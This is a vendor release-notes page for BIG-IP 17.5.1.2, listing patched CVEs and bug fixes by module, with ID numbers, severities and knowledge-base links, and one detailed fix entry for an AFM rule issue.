Supplemental Document : BIG-IP 17.5.1.2 Fixes and Known Issues

Applies To:

Show Versions Show Versions

BIG-IP APM

  • 17.5.1

BIG-IP Analytics

  • 17.5.1

BIG-IP Link Controller

  • 17.5.1

BIG-IP LTM

  • 17.5.1

BIG-IP AFM

  • 17.5.1

BIG-IP PEM

  • 17.5.1

BIG-IP DNS

  • 17.5.1

BIG-IP FPS

  • 17.5.1

BIG-IP ASM

  • 17.5.1
Updated Date: 09/16/2025

BIG-IP Release Information

Version: 17.5.1.2
Build: 5.0

Note: This content is current as of the software release date
Updates to bug information occur periodically. For the most up-to-date bug data, see Bug Tracker.

The blue background highlights fixes


Cumulative fixes from BIG-IP v17.5.1 that are included in this release
Known Issues in BIG-IP v17.5.x

Vulnerability Fixes

ID Number CVE Links to More Info Description Fixed Versions
1068653-3 CVE-2021-20271 K10396196 CVE-2021-20271 rpm: Signature checks bypass via corrupted rpm package 17.5.1.2
981885-8 CVE-2020-8285 K61186963 CVE-2020-8285 curl: malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used 17.5.1.2
945421-12 CVE-2020-1968 K92451315, BT945421 CVE-2020-1968: Raccoon vulnerability 17.5.1.2, 16.1.6
798889-3 CVE-2018-20836 K11225249 CVE-2018-20836 kernel: race condition in smp_task_timedout() and smp_task_done() in drivers/scsi/libsas/sas_expander.c leads to use-after-free 17.5.1.2
765053-11 CVE-2019-1559 K18549143 OpenSSL vulnerability CVE-2019-1559 17.5.1.2
1983321-1 CVE-2025-48976 K000152614 CVE-2025-48976 apache-commons-fileupload: Apache Commons FileUpload DoS via part headers 17.5.1.2
1937817-4 CVE-2025-54500 K000152001 CVE-2025-54500: A Particular HTTP/2 sequence may cause High CPU utilization [MadeYouReset] 17.5.1.2
1787149-2 CVE-2019-18348 K000153042 CVE-2019-18348 python: CRLF injection via the host part of the url passed to urlopen() 17.5.1.2
1678793-5 CVE-2019-14863 K000141459 CVE-2019-14863 angular: Cross-site Scripting (XSS) due to no proper sanitization of xlink:href attributes 17.5.1.2
1678789-5 CVE-2019-10768 K000141463 CVE-2019-10768 AngularJS: Prototype pollution in merge function could result in code injection 17.5.1.2
1678777-5 CVE-2022-25869 K000141459 CVE-2022-25869 angular.js : insecure page caching in the browser, which allows interpolation of <textarea> elements. 17.5.1.2
1678769-5 CVE-2023-26116 K000141463 CVE-2023-26116 angularjs: Regular Expression Denial of Service via angular.copy() 17.5.1.2
1600561-5 CVE-2024-2961 K000140901 CVE-2024-2961 glibc Vulnerability 17.5.1.2
1596097-5 CVE-2023-37369 K000148809 CVE-2023-37369 qtbase: buffer overflow in QXmlStreamReader 17.5.1.2
1596073-5 CVE-2023-38197 K000148809 CVE-2023-38197 qtbase: infinite loops in QXmlStreamReader 17.5.1.2
1589645-5 CVE-2019-3859 K000149288 CVE-2019-3859 libssh2: Unchecked use of _libssh2_packet_require and _libssh2_packet_requirev resulting in out-of-bounds read 17.5.1.2
1390457-6 CVE-2022-25147 K000137702 CVE-2022-25147 apr-util: out-of-bounds writes in the apr_base64 17.5.1.2
1306305-2 CVE-2023-24998 K000133052 CVE-2023-24998 [Apache Tomcat]: FileUpload DoS with excessive parts 17.5.1.2
1266853-8 CVE-2023-24998 K000133052 CVE-2023-24998 Apache Commons FileUpload: FileUpload DoS with excessive parts 17.5.1.2
1099369-9 CVE-2018-25032 K21548854 CVE-2018-25032 [NodeJS]zlib: A flaw found in zlib, when compressing (not decompressing!) certain inputs. 17.5.1.2
1043977-10 CVE-2021-3672
CVE-2021-22931
K53225395 CVE-2021-3672 CVE-2021-22931 NodeJS Vulnerabilities in iAppLX 17.5.1.2
1035781-9 CVE-2021-33909 K75133288 See: https://my.f5.com/manage/s/article/K75133288 17.5.1.2
965545-10 CVE-2020-27617 K41142448 CVE-2020-27617 : QEMU Vulnerability 17.5.1.2
874521-3 CVE-2019-1551 K43798238 OpenSSL vulnerability: CVE-2019-1551 17.5.1.2
872109-12 CVE-2019-17563 K24551552 CVE-2019-17563: Tomcat Vulnerability 17.5.1.2
1697273-4 CVE-2020-8037 K000149929 CVE-2020-8037 tcpdump: ppp decapsulator can be convinced to allocate a large amount of memory 17.5.1.2
1591481-4 CVE-2017-1000381 K000149130 CVE-2017-1000381: C-ares Vulnerability iRulesLX 17.5.1.2
1586537-3 CVE-2024-0985 K000140188 CVE-2024-0985 postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL 17.5.1.2
1566997-5 CVE-2016-10349 K000148259 CVE-2016-10349 libarchive: Heap-based buffer over-read in the archive_le32dec function 17.5.1.2
1326665-6 CVE-2023-32067 K000135831 CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service 17.5.1.2
1240373-4 CVE-2022-37436 K000132665 CVE-2022-37436: Flaw in mod_proxy module of httpd 17.5.1.2
1029013-9 CVE-2016-10228 K52494142 CVE-2016-10228 glibc: iconv program can hang when invoked with the -c option 17.5.1.2
1678809-5 CVE-2023-26117 K000150967 CVE-2023-26117: Angular JS vulnerability 17.5.1.2
1678805-5 CVE-2023-26118 K000150967 CVE-2023-26118 angularjs: Regular Expression Denial of Service via the <input type="url"> element 17.5.1.2
1470177-6 CVE-2023-46218 K000138650 CVE-2023-46218 curl: information disclosure by exploiting a mixed case flaw 17.5.1.2


Functional Change Fixes

None


TMOS Fixes

ID Number Severity Links to More Info Description Fixed Versions
1927513-1 2-Critical   SIGSEGV TMM core ikev2_encrypt_packet_construct at iked/ikev2_packet.c:334 17.5.1.2
1787621-2 2-Critical BT1787621 TMM may unexpectedly restart during IPsec tunnel negotiation 17.5.1.2
1983229-4 3-Major   Security exposure with -z (postrotate-command) option in tcpdump 17.5.1.2
1965053-1 3-Major BT1965053 Keymgmtd: Incorrect and misleading debug log statements 17.5.1.2
1952729-1 3-Major BT1952729 Certificates with explicitly defined EC parameters are treated as invalid in Common Criteria mode and TLS communication will be rejected. 17.5.1.2
1936233-1 3-Major BT1936233 TMM mismanagement of IPsec connections can slowly leak memory and cause tunnel negotiation to fail 17.5.1.2
1935833-2 3-Major BT1935833 Tmm cores with "ERR: Attempting to send MPI message to ourself" 17.5.1.2
1928749-2 3-Major BT1928749 TMM cores in rare circumstances 17.5.1.2
1856449-1 3-Major BT1856449 [keymgmtd]OpenSSL: DRBG Continuous RNG test failed: DRBG stuck. 17.5.1.2
1853721-3 3-Major BT1853721 User has reached maximum active login tokens 17.5.1.2
1505301-2 3-Major   CVE-2022-29154 rsync: remote arbitrary files write inside the directories of connecting peers 17.5.1.2
1069341-2 3-Major   CVE-2016-4738 libxslt: Heap overread due to an empty decimal-separator 17.5.1.2
1027237-5 3-Major BT1027237 Cannot edit virtual server in GUI after loading config with traffic-matching-criteria 17.5.1.2
1983185-1 4-Minor BT1983185 REST API queries sent to BIG-IP v17.5.1 fail if they are using v17.5.0 API version 17.5.1.2
1753617-5 4-Minor   CVE-2023-24621 Untrusted Polymorphic Deserialization to Java Classes 17.5.1.2
1314333-2 4-Minor   Patch gnutls library for CVEs CVE-2018-10844, CVE-2018-10845, CVE-2018-10846 17.5.1.2
1061485-9 4-Minor   CVE-2019-19527: Linux kernel vulnerability 17.5.1.2
1059229-3 4-Minor   CVE-2019-16994 kernel: Memory leak in sit_init_net() in net/ipv6/sit.c 17.5.1.2
1058197-10 4-Minor   CVE-2019-14973: LibTIFF Vulnerability 17.5.1.2
1052333-8 4-Minor   CVE-2018-16885: Linux kernel vulnerability 17.5.1.2
1052245-9 4-Minor   CVE-2018-13093 kernel: NULL pointer dereference in lookup_slow function 17.5.1.2
1052181-8 4-Minor   CVE-2018-7191 kernel: denial of service via ioctl call in network tun handling 17.5.1.2
1051869-9 4-Minor   CVE-2018-20169: Linux kernel vulnerability 17.5.1.2
1051769-8 4-Minor   CVE-2019-10140 kernel: overlayfs: NULL pointer dereference in ovl_posix_acl_create function in fs/overlayfs/dir.c 17.5.1.2
1051697-9 4-Minor   CVE-2019-11833 kernel: fs/ext4/extents.c leads to information disclosure 17.5.1.2


Local Traffic Manager Fixes

ID Number Severity Links to More Info Description Fixed Versions
2017137 2-Critical   pkcs11d Crash Risk Due to Unbounded Label/Password Length from MCPd 17.5.1.2
1519001-4 2-Critical BT1519001 After a crash, tmm may experience memory corruption 17.5.1.2
932461-9 3-Major BT932461 Certificate update on the SSL profile server for the HTTPS monitor: BIG-IP does not use the updated certificate. 17.5.1.2
1952657-1 3-Major BT1952657 In FIPS-CC mode ECC Certificates with explicitly defined EC parameters are accepted 17.5.1.2
1937777-1 3-Major BT1937777 The client can resume a TLS session using psk_ke mode in the psk_key_exchange_modes extension. 17.5.1.2
1934781-2 3-Major BT1934781 In FIPS-CC mode ECC Certificates with explicitly defined EC parameters are accepted 17.5.1.2
1826185-2 3-Major BT1826185 Tenants on r2000 and r4000 series may drop packets larger than 9194 bytes 17.5.1.2
1708189-3 3-Major BT1708189 ICMP errors with HSL can rarely cause tmm cores 17.5.1.2
1697041-2 3-Major BT1697041 TMM may fail to start, device is inoperative 17.5.1.2
1553169-4 3-Major BT1553169 Parsing tcp payload using iRules can be inaccurate because of binary to string conversion 17.5.1.2
1273161-5 3-Major BT1273161 Secondary blades are unavailable, clusterd is reporting shutdown, and waiting for other blades 17.5.1.2
1622425-2 4-Minor BT1622425 Float the management ip to the next available ip when the connectivity of primary blade is lost 17.5.1.2


Global Traffic Manager (DNS) Fixes

ID Number Severity Links to More Info Description Fixed Versions
1962785-3 3-Major   Monitors of type snmp_link can fail 17.5.1.2
1592209-3 3-Major BT1592209 Monitored objects stays "Offline (Enabled)" even after manually enabling the server object after reboot 17.5.1.2
1041889-5 3-Major BT1041889 RRSIG missing for CNAME with RDATA in different zone 17.5.1.2


Application Security Manager Fixes

ID Number Severity Links to More Info Description Fixed Versions
1798601-4 2-Critical BT1798601 BD restart loop after upgrade on error in CONFIG_TYPE_ACCOUNT_CHARSET_TEMPLATES 17.5.1.2
1365629-5 2-Critical BT1365629 FPS signature and engine update fail to access sys db key proxy.password 17.5.1.2, 17.1.2
1934513-2 3-Major   Redefinition of xlink namespace leads to 'malformed document' violation 17.5.1.2
1927225-2 3-Major BT1927225 Vertical tab (u000b) is removed from the request by the JSON parser 17.5.1.2
1783217-1 4-Minor BT1783217 Rare bd crash 17.5.1.2


Access Policy Manager Fixes

ID Number Severity Links to More Info Description Fixed Versions
1966729-1 2-Critical   Endpoint inspection not working with chrome browser 17.5.1.2
1819813-2 2-Critical BT1819813 [APM][NTLM]TMM core on null _ntlm_msg on 17.1.x on top of ID1495381 17.5.1.2
608745-3 3-Major   Send HOST header in OCSP responder request 17.5.1.2
1965849-1 3-Major BT1965849 [APM] TMM core is observed in validating the saml assertion signature 17.5.1.2
1826013-1 3-Major K000150397, BT1826013 BIG-IP as Oauth C/RS "Invalid json error" after upgrade to 17.1.2.1 when json response has non ASCII characters 17.5.1.2
1771945-2 3-Major BT1771945 Memory leak when using event-wait with SSL SANs 17.5.1.2
1617037-4 3-Major BT1617037 [PA]"navigator.userAgent" detects Chrome browser as Safari 17.5.1.2
1587453-2 3-Major BT1587453 “default-all” profile is selected by default in “Dynamic LAN address spaces” 17.5.1.2
1587421-2 3-Major BT1587421 GUI issue when creating a new Network Access connection 17.5.1.2
1583745-3 3-Major BT1583745 "Out of bounds" TCL error in VDI iRule 17.5.1.2
1008885-3 3-Major   Sessiondump CPU is showing unknown for Mac OS and BIG-IP platform 17.5.1.2
1701209-2 4-Minor BT1701209 APM ignores the update-interval setting 17.5.1.2


Advanced Firewall Manager Fixes

ID Number Severity Links to More Info Description Fixed Versions
1786325-3 2-Critical BT1786325 Nxdomain stop blocking & nxdomain added into the allow list on rSeries 17.5.1.2
935769-8 3-Major BT935769 Upgrading / Rebooting BIG-IP with huge address-list configuration takes a long time 17.5.1.2
1635209-3 3-Major BT1635209 Firewall NAT policy with SNAT automap does not work with ALG protocols in active mode 17.5.1.2


Protocol Inspection Fixes

ID Number Severity Links to More Info Description Fixed Versions
1756825-4 2-Critical   IPS Signatures not inspected being sometime after reboot 17.5.1.2


Functional Change Fixes

None



Cumulative fixes from BIG-IP v17.5.1 that are included in this release


Vulnerability Fixes

ID Number CVE Links to More Info Description Fixed Versions
1881373-2 CVE-2024-3661 K000139553, BT1881373 CVE-2024-3661 Tunnelvision Vulnerability 17.5.1
1582781-6 CVE-2021-23177 K000140961, BT1582781 CVE-2021-23177 libarchive: extracting a symlink with ACLs modifies ACLs of target 17.5.1
1353609-8 CVE-2023-45886 K000137315, BT1353609 ZebOS BGP vulnerability CVE-2023-45886 17.5.1
987813-14 CVE-2020-25643 K65234135, BT987813 CVE-2020-25643 kernel:improper input validation in the ppp_cp_parse_cr function 17.5.1
975605-11 CVE-2018-1122 K00409335, BT975605 CVE-2018-1122 procps-ng, procps: Local privilege escalation in top 17.5.1
785209-6 CVE-2019-9074 K09092524, BT785209 CVE-2019-9074 binutils: out-of-bound read in function bfd_getl32 17.5.1
760895-13 CVE-2009-5155 K64119434, BT760895 CVE-2009-5155 glibc: parse_reg_exp in posix/regcomp.c misparses alternatives leading to denial of service or trigger incorrect result 17.5.1
1787153-2 CVE-2019-9740 BT1787153 CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen() 17.5.1
1772377-3 CVE-2024-7006 K000152542 Libtiff CVE-2024-7006: NULL pointer dereference in tif_dirinfo.c 17.5.1
1672313-5 CVE-2016-9841 K000149915, BT1672313 CVE-2016-9841 zlib: Out-of-bounds pointer arithmetic in inffast.c 17.5.1
1672249-5 CVE-2016-9840 K000149905, BT1672249 CVE-2016-9840 zlib: Out-of-bounds pointer arithmetic in inftrees.c 17.5.1
1589661-5 CVE-2019-3860 K000149288, BT1589661 CVE-2019-3860 libssh2: Out-of-bounds reads with specially crafted SFTP packets 17.5.1
1585277-4 CVE-2024-28757 K000139637, BT1585277 Libexpat through 2.6.1 allows an XML Entity Expansion attack: CVE-2024-28757 17.5.1, 17.1.2.2
1576897-4 CVE-2016-9063 K000139691, BT1576897 CVECVE-2016-9063 firefox: Possible integer overflow to fix inside XML_Parse in Expat 17.5.1
1576125-4 CVE-2024-27983 K000139532, BT1576125 Node.js vulnerability CVE-2024-27983 17.5.1, 17.1.2.2
1572145-5 CVE-2023-29469 K000139592, BT1572145 CVE-2023-29469 libxml2: Hashing of empty dict strings isn't deterministic 17.5.1
1517561-5 CVE-2023-28484 K000139641, BT1517561 CVE-2023-28484 libxml2: NULL dereference in xmlSchemaFixupComplexType 17.5.1
1494229-5 CVE-2023-2953 K000138814, BT1494229 CVE-2023-2953 openldap: null pointer dereference in ber_memalloc_x function 17.5.1
1441577-6 CVE-2023-42795 K000138178, BT1441577 CVE-2023-42795 tomcat: improper cleaning of recycled objects could lead to information leak 17.5.1
1393733-8 CVE-2022-43750 K000139700, BT1393733 CVE-2022-43750 kernel: memory corruption in usbmon driver 17.5.1
1327169-7 CVE-2023-24329 K000135921, BT1327169 CVE-2023-24329 python: urllib.parse url blocklisting bypass 17.5.1
1306309-4 CVE-2023-28709 K000135262, BT1306309 CVE-2023-28709 Apache tomcat: Fix for CVE-2023-24998 was incomplete 17.5.1
1301545-7 CVE-2023-0568 K000134747, BT1301545 CVE-2023-0568 php: 1-byte array overrun in common path resolve code 17.5.1
1270257-8 CVE-2023-0662 K000133753, BT1270257 CVE-2023-0662 php: DoS vulnerability when parsing multipart request body 17.5.1
1093685-8 CVE-2021-4083 K52379673, BT1093685 CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it 17.5.1
1057141-7 CVE-2018-14647 K000151007, BT1057141 CVE-2018-14647 python: Missing salt initialization in _elementtree.c module 17.5.1
1041141-3 CVE-2021-35942 K98121587, BT1041141 CVE-2021-35942 glibc: Arbitrary read in wordexp() 17.5.1
1028701-12 CVE-2019-9947 K000151516, BT1028701 CVE-2019-9947 python: CRLF injection via the path part of the url passed to urlopen() 17.5.1
1001369-9 CVE-2020-12049 K16729408, BT1001369 D-Bus vulnerability CVE-2020-12049 17.5.1, 15.1.4.1
988589-11 CVE-2019-25013 K68251873, BT988589 CVE-2019-25013 glibc vulnerability: buffer over-read in iconv 17.5.1, 15.1.4.1
921525-7 CVE-2020-1752 K49921213, BT921525 CVE-2020-1752: glibc vulnerability using glob 17.5.1
1692917-5 CVE-2024-6232 K000148252, BT1692917 CVE-2024-6232 CPython Tarfile vulnerability 17.5.1
1623197-5 CVE-2024-37891 K000140711, BT1623197 CVE-2024-37891 urllib3: proxy-authorization request header is not stripped during cross-origin redirects 17.5.1
1591249-5 CVE-2018-6913 K000141301, BT1591249 CVE-2018-6913 perl: heap buffer overflow in pp_pack.c 17.5.1
1566533-7 CVE-2017-18342 K000139901, BT1566533 CVE-2017-18342 PyYAML: yaml.load() API could execute arbitrary code 17.5.1
1336185-6 CVE-2018-12123 K000137090, BT1336185 NodeJS Vulnerability - CVE-2018-12122 17.5.1
1330801-8 CVE-2018-12123, CVE-2018-12121, CVE-2018-12122 K000137090, BT1330801 NodeJS Vulnerability CVE-2018-12123, CVE-2018-12121, CVE-2018-12122 17.5.1
1304081-7 CVE-2023-2650 K000135178, BT1304081 CVE-2023-2650 openssl: Possible DoS translating ASN.1 object identifiers 17.5.1
1673161-4 CVE-2023-45853 K000149884, BT1673161 CVE-2023-45853 zlib: integer overflow and resultant heap-based buffer overflow in zipOpenNewFileInZip4_6 17.5.1


Functional Change Fixes

None


TMOS Fixes

ID Number Severity Links to More Info Description Fixed Versions
949509-11 2-Critical   Eviction Policy UI Hardening 17.5.1
740258-2 2-Critical BT740258 Support IPv6 connections to TACACS+ remote auth servers 17.5.1
1934401-1 2-Critical BT1934401 iSeries HSB v5.26.8.0 firmware 17.5.1
1934393-1 2-Critical BT1934393 iSeries HSB v5.9.14.0 firmware 17.5.1
1934385-1 2-Critical BT1934385 iSeries HSB v4.3.5.0 firmware 17.5.1
1926989-1 2-Critical BT1926989 BIG-IP Virtual Edition: kswapd running constantly and consuming most of the CPU cycles of a core 17.5.1
1492337-4 2-Critical BT1492337 TMM fails to start up using Xnet-DPDK-virtio due to out of bounds MTU 17.5.1
1382313-5 2-Critical   TMM might crash under certain conditions 17.5.1
891333-6 3-Major K32545132, BT891333 The HSB on BIG-IP platforms can get into a bad state resulting in packet corruption. 17.5.1
867253-7 3-Major BT867253 Systemd not deleting user journals 17.5.1
1934493-2 3-Major   BIG-IP SFTP hardening 17.5.1
1922525-1 3-Major   BIG-IP SCP hardening 17.5.1
1922501-1 3-Major BT1922501 TMM crash loop due to missing kernel driver 17.5.1
1920341-1 3-Major BT1920341 SSH Public Key authentication allows RSA and not ECDSA in ccmode 17.5.1
1880365-1 3-Major BT1880365 Cannot log into Fs_v2 Azure BIG-IP with >= 32 vCPUs and >= 5 interfaces 17.5.1
1798961-2 3-Major BT1798961 With CC/FIPS license installed, OpenSSL should raise fatal alert when client does not advertise EMS support 17.5.1
1789477-4 3-Major BT1789477 Orphaned tmsh processes might eventually lead to an out-of-memory condition 17.5.1
1622789-3 3-Major BT1622789 Traffic levels for NAT64/46 traffic might be different after an upgrade 17.5.1, 17.1.2
1621269-1 3-Major BT1621269 TMM restart loop when attaching large number of interfaces. 17.5.1
1550785-4 3-Major   HSB lock up in Syn-Ack generator module 17.5.1, 17.1.0
1121517-5 3-Major BT1121517 Interrupts on Hyper-V are pinned on CPU 0 17.5.1, 16.1.4, 15.1.10
1047789-1 3-Major BT1047789 [APM] MCP err msg seen when editing/applying resource assign in VPE 17.5.1
857045-6 4-Minor BT857045 LDAP system authentication may stop working 17.5.1, 16.1.5
1753933-4 4-Minor   CVE-2020-14393 perl-dbi: Buffer overflow on an overlong DBD class name 17.5.1
1623597-3 4-Minor BT1623597 Nat46/64 hardware connection re-offload is not optimal. 17.5.1
1401961-4 4-Minor BT1401961 A blade with a non-functional backplane may override the dag context for the whole system 17.5.1
1144421-3 4-Minor   CVE-2019-14866 cpio: improper input validation when writing tar header fields leads to unexpected tar generation 17.5.1
1069949-8 4-Minor   CVE-2018-1000007 curl: HTTP authentication leak in redirects 17.5.1
1052249-8 4-Minor   CVE-2018-13094 kernel: NULL pointer dereference in xfs_da_shrink_inode function 17.5.1
1052217-8 4-Minor   CVE-2018-19985 kernel: oob memory read in hso_probe in drivers/net/usb/hso.c 17.5.1
1580357-2 5-Cosmetic   CVE-2016-2037 CVE-2015-1197 cpio: out of bounds write 17.5.1


Local Traffic Manager Fixes

ID Number Severity Links to More Info Description Fixed Versions
1825513 1-Blocking BT1825513 ClientSSL profile with PQC group may cause TMM to crash 17.5.1
1756525-2 2-Critical BT1756525 ixlv driver could have failed hardware offload with TSO off 17.5.1
1579533-3 2-Critical BT1579533 Jitterentropy read is restricted to FIPS mode or TMM usage only, for performance reasons 17.5.1
1267221-5 2-Critical BT1267221 When TMM starts, Hyper-V shows no RX packets on the ethX interface 17.5.1
881065-8 3-Major BT881065 Adding port-list to Virtual Server changes the route domain to 0 17.5.1
1928537-1 3-Major BT1928537 Missing initial PKCS11d login state causes login failures on certain AWS CloudHSMs 17.5.1
1825241-4 3-Major BT1825241 MCPD validation fails when non-existent cipher group is referenced by SSL profile 17.5.1
1821033-2 3-Major BT1821033 Assertion "packet must already have an ethernet header" when using tcpdump 17.5.1
1814821-3 3-Major BT1814821 DHE groups present in profile's cipherlist with TLS1.3 enabled and tmm.ssl.useffdhe set to false simultaneously 17.5.1
1636077-2 3-Major BT1636077 Adding an operationally DOWN interface to existing LAG causes traffic disruption on r2k/r4k 17.5.1
1555525-4 3-Major BT1555525 WCCP traffic may have its source port changed 17.5.1, 17.1.2, 16.1.6
1550869-4 3-Major BT1550869 Tmm leak on request-logging or response logging on FTP virtual server 17.5.1
1505649-3 3-Major BT1505649 SSL Handshake fall back to full handshake during session resumption, if SNI string is more than 32 characters in length 17.5.1, 17.1.2
1382181-2 3-Major BT1382181 BIG-IP resets only server-side on idle timeout when used FastL4 profile with loose-* settings enabled 17.5.1
1309637-5 3-Major BT1309637 Mac masquerade not working after VLAN movement on host interfaces 17.5.1
1282837-4 3-Major   DTLS1.2 Handshakes are causing tmm crash with mTLS connection 17.5.1
1620785-4 4-Minor BT1620785 F5 cache mechanism relies only on Last-Modified/If-Modified-Since headers and ignores the etag/If-None-Match headers 17.5.1
1352649-4 4-Minor BT1352649 The trailing semicolon at the end of [HTTP::path] in the iRule is being omitted. 17.5.1


Performance Fixes

ID Number Severity Links to More Info Description Fixed Versions
1814477-1 2-Critical BT1814477 AWS Performance Drop from BIG-IP v17.1.2.1 to v17.5.0 17.5.1


Global Traffic Manager (DNS) Fixes

ID Number Severity Links to More Info Description Fixed Versions
1856289-2 3-Major BT1856289 Virtual server, which is managed by remote LTM device, is shown as "offline/enabled" with "Monitor /Common/bigip : no reply from big3d: timed out" message (red diamond icon). 17.5.1
1756397-3 3-Major BT1756397 BIG-IP is not forwarding the Extended DNS Error (EDE) Codes to Clients 17.5.1


Application Security Manager Fixes

ID Number Severity Links to More Info Description Fixed Versions
1857413-2 2-Critical BT1857413 Malformed XML data or Malformed JSON data violation raised despite URL containing content-profile 17.5.1
1758153-5 2-Critical   Configuring a Data Guard URL longer than 1024 characters triggers a restart loop 17.5.1
1920057-1 3-Major   Bd crashes 17.5.1
1789529-3 3-Major BT1789529 A crash of the bd daemon 17.5.1
1629701-2 3-Major BT1629701 Attack signature is not shown in local event log for staged entity when not in learn/staging 17.5.1
1621185-2 3-Major BT1621185 A BD crash on a specific scenario, even after ID1553989 17.5.1
1812201-4 4-Minor BT1812201 A specific unicode character issue a malformed json violation 17.5.1
1782365-3 4-Minor BT1782365 Importing a policy creates default 'password' sensitive parameter when it is not present in the exported policy in full JSON format 17.5.1
1709557-2 4-Minor BT1709557 Header value length greater than 1023 in alternate response file headers causing ASM restart loop 17.5.1
1469393-2 4-Minor BT1469393 Browser extension can cause Bot-Defense profile screen to misfunction 17.5.1


Access Policy Manager Fixes

ID Number Severity Links to More Info Description Fixed Versions
1930945 1-Blocking BT1930945 [APM][KERBEROS][NTLM FALLBACK] Kerberos Authentication fails post-upgrade to v17.5.0/v17.5.1 — “Profile '/Common/kerberos_auth_config_default' was not found” and ECA Crashes 17.5.1
930625-6 2-Critical BT930625 TMM crash is seen due to double free in SAML flow 17.5.1
1825949-2 2-Critical BT1825949 [APM][Radius] Message-Authenticator value is incorrect for OTP request 17.5.1
1821373-2 2-Critical BT1821373 SAML Assertion Handling issue in APM SSO 17.5.1
1783081-3 2-Critical BT1783081 Removing conditional freeing for m_oauth instances in tmm 17.5.1
1773161-2 2-Critical BT1773161 BIG-IP APM 17.1.2 VPN tunnels failed to establish at "GET /isession" stage 17.5.1
1552705-6 2-Critical BT1552705 New subsession reads access_token from per-session policy instead of per-request policy. 17.5.1, 16.1.6
648946-4 3-Major BT648946 Oauth server is not registered in the map for HA addresses 17.5.1
641662-1 3-Major BT641662 Always connected exclusion list does not support more than 10 entries. 17.5.1
634576-6 3-Major K48181045, BT634576 TMM core in per-request policy 17.5.1, 16.1.5, 13.1.0
1926885 3-Major BT1926885 [APM] URL DB mismatch error for Religion categories in the upgrade 17.5.1
1917741-2 3-Major BT1917741 [APM][TMM] memory growth in SAML SP while decoding assertion attributes 17.5.1
1813841-1 3-Major BT1813841 Password Caching setting is not applied 17.5.1
1813209-1 3-Major BT1813209 Password Cache Expiration field is hidden in Connectivity profile 17.5.1
1796609-3 3-Major BT1796609 [APM][VDI]TCL error when upgrading to 17.x: can't read "tmm_apm_feed_login": no such variable 17.5.1, 16.1.6
1789501-3 3-Major BT1789501 [APM][Standard Customisation]Webtop is blank after upgrading APM version 17.1.2 with Edge Browser in Compatibility mode. 17.5.1
1782113-3 3-Major BT1782113 Parameter 'redirectwebauthn:i:0' is crashing the RDP file with 'The RDP File is corrupted' error message 17.5.1
1771985-3 3-Major BT1771985 [APM] OAuth AS max claims data support upto 8kb dynamically 17.5.1
1758181-2 3-Major BT1758181 Optimal gateway routing issue with HTML5 client 17.5.1
1672997-3 3-Major BT1672997 Apmd memory grows over time in AD/LDAP auth scenarios 17.5.1, 16.1.6
1628001-4 3-Major BT1628001 TMM core when ACL operation is performed on a deleted session 17.5.1
1623941-4 3-Major BT1623941 [AD] BIG-IP APM AD Auth agent sometimes prompts for new password (every login) after upgrade 17.5.1, 16.1.6
1583261-3 3-Major BT1583261 Saml traffic can rarely cause tmm cores 17.5.1
1567761-3 3-Major BT1567761 [APM] AccessProfile name is missing in log User '<username>' belongs to domain '<domain_name>' 17.5.1
1400533-5 3-Major BT1400533 TMM core dump include SIGABRT multiple times, on the Standby device. 17.5.1
1292605-4 3-Major BT1292605 Uncaught ReferenceError: ReferenceError: REquest is not defined 17.5.1
1269709-5 3-Major BT1269709 GUI should throw the error when the VS is configured with both vdi and HTTP/2 profiles 17.5.1, 17.1.2, 16.1.5
1144673-5 3-Major   Persistent Connection Issue in SSO v2 Plugin 17.5.1
1081245-3 3-Major BT1081245 [APM] SSO OAuth Bearer passthrough inserts an old access token instead of the latest one. 17.5.1
1078713-1 3-Major BT1078713 Windows 11 not included in client OS check and Windows Info agent. 17.5.1
926917-4 4-Minor BT926917 Portal Access: unwanted decoding html entities in attribute values of HTML tags 17.5.1
811829-3 4-Minor BT811829 BIG-IP as Authorization server: OAuth Report GUI display expired token as active 17.5.1
485387-2 4-Minor BT485387 EncryptedAssertion may not be processed by BIG-IP as SP when EncryptedKey element is specified by RetrievalMethod Element by external IdP. 17.5.1
1825449-2 4-Minor BT1825449 Citrix Optimal Gateway Routing is not showing login username of session 17.5.1
1818461-2 4-Minor BT1818461 [APM][VPN][WIN] Tunnel can't be established if endpoint inspection is Skipped. Machine Hash is not maching 17.5.1
1737465-3 4-Minor BT1737465 Port number being used for verifying server certificate CN field 17.5.1
1612885-3 4-Minor BT1612885 [PORTAL] Handle error in get_frameElement() 17.5.1, 17.1.2
1591813-12 4-Minor BT1591813 [APM][SAML] SP automation fails with error message 'cannot update (cert_type)' 17.5.1


Advanced Firewall Manager Fixes

ID Number Severity Links to More Info Description Fixed Versions
1132449-6 1-Blocking BT1132449 Incomplete or missing IPv6 IP Intelligence database results to connection reset and/or high TMM CPU usage 17.5.1, 16.1.6
997169-4 3-Major BT997169 AFM rule not triggered 17.5.1, 17.1.2, 16.1.6, 15.1.4.1
1936421-2 3-Major BT1936421 Core generated for autodosd daemon when synchronization process is terminated 17.5.1
1934865-1 3-Major BT1934865 Remove multiple redundant entries for port-list objects in configuration file 17.5.1


Traffic Classification Engine Fixes

ID Number Severity Links to More Info Description Fixed Versions
1826393-4 3-Major   TMM may restart when handling undisclosed traffic handled by IPS 17.5.1


Device Management Fixes

ID Number Severity Links to More Info Description Fixed Versions
985329-5 3-Major BT985329 Saving UCS takes longer and leaves temp files when iControl LX extension is installed 17.5.1, 17.5.0, 17.1.2, 16.1.5
1626337-4 3-Major K81310610, BT1626337 RPMS not being included in the generated UCS with fix of ID985329 incorporated 17.5.1


In-tmm monitors Fixes

ID Number Severity Links to More Info Description Fixed Versions
1819777-4 2-Critical BT1819777 In-tmm TCP monitor with no RCV and RCVdisable string might lead to a crash 17.5.1

 

Cumulative fix details for BIG-IP v17.5.1.2 that are included in this release

997169-4 : AFM rule not triggered

Links to More Info: BT997169

Component: Advanced Firewall Manager

Symptoms:
An AFM rule is not triggered when it should be.

Conditions:
-- Source and destination zone configured
-- A gateway pool is used in the route

Impact:
A firewall rule is not triggered and the default deny rule is used.

Workaround:
Alter the route to use an IP address and not a pool.

Fix:
Firewall rules are now triggered when gateway pools are used.

Fixed Versions:
17.5.1, 17.1.2, 16.1.6, 15.1.4.1


988589-11 : CVE-2019-25013 glibc vulnerability: buffer over-read in iconv

Links to More Info: K68251873, BT988589


